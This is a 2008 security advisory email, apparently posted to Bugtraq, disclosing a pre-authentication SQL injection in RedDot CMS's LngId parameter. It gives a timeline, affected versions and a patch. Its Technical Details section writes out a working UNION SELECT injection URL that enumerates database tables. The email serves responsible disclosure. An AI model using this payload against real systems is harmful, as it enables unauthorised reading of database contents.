Subject: IRM Security Advisory : RedDot CMS SQL injection vulnerability
Date: Mon, 21 Apr 2008 17:10:10 +0100
Message-ID: <7B01ACCEDD4FFE48B12A55E2DB16A9304CA8E4@dccheltenham.local.irmplc.com.>
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Thread-Topic: IRM Security Advisory : RedDot CMS SQL injection vulnerability
Thread-Index: AcijyZio8YkqOv9VQ9CBw7JVMljkAAAAH1hg
From: "Mark Crowther" <mark.crowther@irmplc.com.>
To: <bugtraq@securityfocus.com.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
RedDot CMS SQL injection vulnerability (CVE Number: CVE-2008-1613)
http://www.irmplc.com/index.php/167-Advisory-026
Vulnerability Type/Importance: SQL injection/Critical
Problem Discovered: =A0=A0=A0 12 February 2008
Vendor Contacted: =A0=A0=A0=A0=A0 19 February 2008
Advisory Published: =A0=A0=A0 21 April 2008
Abstract:
The RedDot CMS Product (http://www.reddot.com) is vulnerable to a =
pre-authentication SQL injection vulnerability which, when exploited, =
allows enumeration of all SQL database content.
Description:
The 'LngId' Parameter passed to IoRD.asp is responsible for assigning =
the language context for the CMS application. The vulnerability exists =
as a result of inadequate validation of user-supplied input within this =
parameter.
Technical Details:
Normal input for the 'LngId' parameter contains a code such as ENG, DEU, =
JP, denoting the language type. This parameter is not properly validated =
and the injection of SQL statements within it allows attackers =
unrestricted access to enumerate information from the database. For =
example:
https://vulnerablehost.com:443/cms/ioRD.asp?Action=3DShowMessage&LngId=3D=
ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where =
xtype=3Dchar(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=3D1
Proof of Concept:
A Proof of Concept (RDdbenum.py) has been developed to automate =
enumeration of entire database content available from =
http://www.irmplc.com/Tools/RDdbenum.py
Workaround / Solutions:
There are no known workarounds for this vulnerability
The Vendor has released a patch for this vulnerability, Release =
7.5.1.86, available from normal Red Dot customer support contacts.
Tested / Affected Versions:
IRM confirmed the presence of this vulnerability in RedDot CMS version =
7.5 Build 7.5.0.48, tested with Microsoft SQL Server 2005 database.
It is believed that this issue exists in RedDot CMS versions 6.5 and =
7.0; however this has not been fully verified.
Credits:
Research and Advisory: Mark Crowther and Rodrigo Marcos
Disclaimer:
All information in this advisory is provided on an 'as is' basis in the =
hope that it will be useful. Information Risk Management Plc is not =
responsible for any risks or occurrences caused by the application of =
this information.
